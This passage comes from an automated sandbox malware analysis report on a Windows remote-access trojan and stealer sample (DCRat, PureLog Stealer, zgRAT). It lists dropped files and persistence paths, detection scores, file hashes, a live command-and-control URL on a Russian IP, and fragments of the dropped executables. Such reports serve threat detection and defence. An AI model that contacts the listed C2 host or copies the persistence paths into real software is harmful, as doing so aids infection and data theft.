                            teh76E2k50.exe100%AviraHEUR/AGEN.1323342
                            teh76E2k50.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat100%AviraBAT/Delbat.C
                            C:\Users\user\Desktop\BVbCJhtL.log100%AviraTR/AVI.Agent.updqb
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\BSjUAQPo.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\ASPeVAWX.log100%Joe Sandbox ML
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\BMbUPQnU.log100%Joe Sandbox ML
                            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\AQotzTRR.log21%ReversingLabs
                            C:\Users\user\Desktop\ASPeVAWX.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\AVHMeQAt.log24%ReversingLabs
                            C:\Users\user\Desktop\AWpwsIZS.log12%ReversingLabs
                            C:\Users\user\Desktop\AefMODTq.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\ApHNCCYS.log3%ReversingLabs
                            C:\Users\user\Desktop\BGEGNIeN.log21%ReversingLabs
                            C:\Users\user\Desktop\BMbUPQnU.log5%ReversingLabs
                            C:\Users\user\Desktop\BQYWEsJr.log24%ReversingLabs
                            C:\Users\user\Desktop\BSjUAQPo.log4%ReversingLabs
                            C:\Users\user\Desktop\BVbCJhtL.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\BWJmXZSj.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\BmiVXCnN.log33%ReversingLabsWin32.Ransomware.Bitpy
                            C:\Users\user\Desktop\BpxnzmkL.log5%ReversingLabs
                            C:\Users\user\Desktop\ByUnjZDH.log13%ReversingLabs
                            C:\Users\user\Desktop\CJDckQCP.log21%ReversingLabs
                            C:\Users\user\Desktop\CUHLiuul.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\CYbeNrdN.log4%ReversingLabs
                            C:\Users\user\Desktop\CYcTTrrX.log5%ReversingLabs
                            C:\Users\user\Desktop\CjKdtCCI.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\CwClOmSr.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\DAfcAdjS.log8%ReversingLabs
                            C:\Users\user\Desktop\DBTJGhcJ.log8%ReversingLabs
                            C:\Users\user\Desktop\DDuvcNgQ.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\DMSuMAAN.log13%ReversingLabs
                            C:\Users\user\Desktop\DUVDVzTj.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\DVEbprGR.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\DXOleQyG.log17%ReversingLabs
                            C:\Users\user\Desktop\DqCnHdQh.log13%ReversingLabs
                            C:\Users\user\Desktop\DswJWuJN.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\EVCmjrsI.log8%ReversingLabs
                            C:\Users\user\Desktop\EeGvsrMf.log17%ReversingLabs
                            C:\Users\user\Desktop\EzoTkVXm.log4%ReversingLabs
                            C:\Users\user\Desktop\FFhdxwlL.log17%ReversingLabs
                            C:\Users\user\Desktop\FFnbpIFd.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\FIZLHNPh.log25%ReversingLabs
                            C:\Users\user\Desktop\FJIjaFCP.log4%ReversingLabs
                            C:\Users\user\Desktop\FUptAQNB.log8%ReversingLabs
                            C:\Users\user\Desktop\FxxLTNKF.log8%ReversingLabs
                            C:\Users\user\Desktop\GGiDqFDB.log21%ReversingLabs
                            C:\Users\user\Desktop\GOTKaosQ.log3%ReversingLabs
                            C:\Users\user\Desktop\GrWSIakL.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\HJAvhXOf.log25%ReversingLabs
                            C:\Users\user\Desktop\HPmLzFXY.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\HgsdOaRa.log8%ReversingLabs
                            C:\Users\user\Desktop\HhaNcSpz.log33%ReversingLabsWin32.Ransomware.Bitpy
                            C:\Users\user\Desktop\HxVaNNSD.log8%ReversingLabs
                            C:\Users\user\Desktop\IJUlMoHw.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\IQFswXwL.log8%ReversingLabs
                            C:\Users\user\Desktop\IQXUcfJd.log21%ReversingLabs
                            C:\Users\user\Desktop\ITPCmwoz.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\IgGVBfqZ.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\IzyaiCCJ.log25%ReversingLabs
                            C:\Users\user\Desktop\JQrKHwDu.log6%ReversingLabs
                            C:\Users\user\Desktop\JRYtVobT.log8%ReversingLabs
                            C:\Users\user\Desktop\JapvNPbx.log25%ReversingLabs
                            C:\Users\user\Desktop\JnnBaKLz.log8%ReversingLabs
                            C:\Users\user\Desktop\JvdSwEFX.log21%ReversingLabs
                            C:\Users\user\Desktop\KDDLYXsV.log6%ReversingLabs
                            C:\Users\user\Desktop\KFIMcleA.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\KGTKXJkx.log17%ReversingLabs
                            C:\Users\user\Desktop\KMbLIKLR.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\KszcatAz.log33%ReversingLabsWin32.Ransomware.Bitpy
                            C:\Users\user\Desktop\LBCkjtUW.log21%ReversingLabs
                            C:\Users\user\Desktop\LESjjfMz.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\LEvStJys.log12%ReversingLabs
                            C:\Users\user\Desktop\LGJlUtwq.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\LNSSdwSp.log13%ReversingLabs
                            C:\Users\user\Desktop\LOtDzcWv.log17%ReversingLabs
                            C:\Users\user\Desktop\LfVByPYY.log12%ReversingLabs
                            C:\Users\user\Desktop\MKncHkNR.log12%ReversingLabs
                            C:\Users\user\Desktop\MbPZGXOu.log4%ReversingLabs
                            C:\Users\user\Desktop\Mdbejyft.log17%ReversingLabs
                            C:\Users\user\Desktop\MjzskGoA.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            		199.232.210.172
                            		truefalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.phptrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://194.135.20.4wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.0000000003109000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003436000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PwWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameteh76E2k50.exe, 00000000.00000002.2305640506.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.0000000003248000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.000000000305B000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003388000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.000000000392C000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    194.135.20.4
                                    		unknownRussian Federation
                                    		49392ASBAXETNRUtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1547568
                                    Start date and time:2024-11-02 17:46:14 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 12m 57s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:60
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:teh76E2k50.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:832D64C5F330BE9505301104FCFC574A.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@88/326@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 20.190.160.17, 40.126.32.68, 20.190.160.14, 40.126.32.74, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.140
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: teh76E2k50.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    12:47:47API Interceptor9x Sleep call for process: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    bg.microsoft.map.fastly.netggS4R1gR04.exeGet hashmaliciousCobaltStrikeBrowse
                                    • 199.232.214.172
                                    7rfw2HqJjJ.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 199.232.214.172
                                    SecuriteInfo.com.Win64.MalwareX-gen.24264.25314.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://parrots-run-fjh.craft.me/kKsdDph47M82kHGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    ahMvIr4vjN.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.210.172
                                    WlewaiA251.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.210.172
                                    ZUT3KQwo87.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.210.172
                                    OQQZ5w8pzt.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.214.172
                                    22PwsPNUJm.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.214.172
                                    cJigU4ar7m.exeGet hashmaliciousAsyncRATBrowse
                                    • 199.232.214.172

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ASBAXETNRUSecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exeGet hashmaliciousXmrigBrowse
                                    • 45.89.228.144
                                    bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                    • 212.192.15.49
                                    https://sub.investorscabirigroup.com/4WQbos10596ktJI775idiwtbqpkk1528WGTFCWTFRKDXPVO305927/749609o14Get hashmaliciousPhisherBrowse
                                    • 45.147.195.16
                                    https://sub.investorscabirigroup.com/4tBfEb10596UgJc775rrkvedqhmm1528ZICWGQLYSOBMUOM389951/749609V14Get hashmaliciousPhisherBrowse
                                    • 45.147.195.16
                                    7p6TMfaWhQ.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    • 45.142.44.233
                                    SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exeGet hashmaliciousXmrigBrowse
                                    • 45.89.228.144
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 212.196.181.191
                                    1U8CPtG8ip.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    • 45.142.44.233
                                    arm5.elfGet hashmaliciousMiraiBrowse
                                    • 212.196.181.184
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 212.192.13.171

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\Desktop\AQotzTRR.logFuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      auXl1Tzyme.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        oLlotc8NO3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                12Vjq7Yv2E.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  7WyBcig6e3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    kBY9lgRaca.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                        Created / dropped Files

                                                        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\81acb8af1bb493

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):153
                                                        Entropy (8bit):5.619539503780824
                                                        Encrypted:false
                                                        SSDEEP:3:sGXcdduWUOGpdNuLYr45R7HVtIRjcfiqWK4zSfg3MMBlpwMIIoEnYa:kP4pCZbH4AdMBleuZnt
                                                        MD5:203CFBD011D103D35663BE382586DF17
                                                        SHA1:B819E7B003812D5D32F534821F6C99E05C663218
                                                        SHA-256:6BB23CB2D61A72EE0D26A768833986EE31FB0CB71273DF9E2F68939C468B9536
                                                        SHA-512:6F11624BF4EB1A70157A1C2F9C5D28F70004F902434EDC2B958578ADD3D4EFB3CD423625182C38066B329435D24E290E5382318F73B6950E2617A3608E544E67
                                                        Malicious:false
                                                        Preview:MIObVbW2w4ZenYTScnZCxFcfhcvgVODbjx1uXDHeX8MUUHd8k6LVp4VGqt32qzgi085zhi4Yf4pz2HKa9x6ZDsvocuEoKOyhboeWMnbBBwzuPfNiid233HeIMQXweQOQGIXOnyNWV4XQ2AZ6hgFqW4nUJ

                                                        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@...................................;.K.....<.p.................... <...................................................... ............... ..H............text...T.;.. ....;................. ..`.rsrc...p.....<.......;.............@....reloc....... <.......;.............@..B................0.;.....H..................o.........1.z.;......................................0..........(.... ........8........E........*...N.......8....*(.... ....~w...{t...:....& ....8....(.... ....~w...{r...9....& ....8....(.... ....~w...{....:....& ....8y......0..)....... ........8........E................>...........8....~....9.... ....~w...{....9....& ....8.......... ....8....~....(N... .... .... ....s....~....(R....... ....~w...{....:e...& ....8Z...8*... ....~w...{....:A...& ....86...r...

                                                        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Program Files\Windows Mail\81acb8af1bb493

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (508), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):508
                                                        Entropy (8bit):5.865907330286289
                                                        Encrypted:false
                                                        SSDEEP:12://FRSEwhggXGDo6NWeirpAv94cSOcGep3pchLcDpvja8mT:/tRx4GDhWRrps4ycGSWM+T
                                                        MD5:D70F6F25B3C4C098840B8FC566438D90
                                                        SHA1:C3F0E57FBD0DC2604592D9357842DB24C1910C24
                                                        SHA-256:1B7264C585C9C86186C98F2D89F7E2948FB9B8D821659E5F7D48BC5E7873601D
                                                        SHA-512:D1E83748F08044F659E3B24157582BCC7C802ED80A6E167864E33AFA79C8C71EDD7692C8A19E48C4AEA505626248F4D88CD7B9D65D5CDF291F338B4CF9C05A60
                                                        Malicious:false
                                                        Preview:S8OrxHKw5MdgZTcZiZJePEpksuDlslcWD716H1RBzNyBMPa3wLiCbPQNTo8CDjDTuHdcbfRrIIpBPnXdUKyhDZ5yrnmc3P8QJeRFw8bQ304SjO8pRfs3ugPUMoux3zy3JZ1uWSqWsinNemOdp6LXgFfnP63HNoXECBJKWNT9yVLL3C0jaRI6naWE3OfZYjIDLiKccDGcnMiL4TuMGTq5gaalpERHs3kPNHAU1XHWLpTb2LKjdSTF2NhuIixYw8ttlS8wSaUtMUu0H8te4roZkfX9jQLTjskM5jzjNXQD7k2icrmJzSeFUUJG58NCOBJdti4iJJRgakc9mzg1oBdROf1lZtoOKOy5bZy4xDApB7ou2KeGbVXMi1POqSIZfCWLvgiNAmEkBxPQ0HtPOiwy1mXjJkNe5kK8ld8VlRFzQxLum9Xji3L7PhUJJ9DaYjpanRoXIYn7c7iEam6KMo6BZNsEIzMmNpbqHvHVUAbKPNfS9QsgC2NtnnAaijOS

                                                        C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
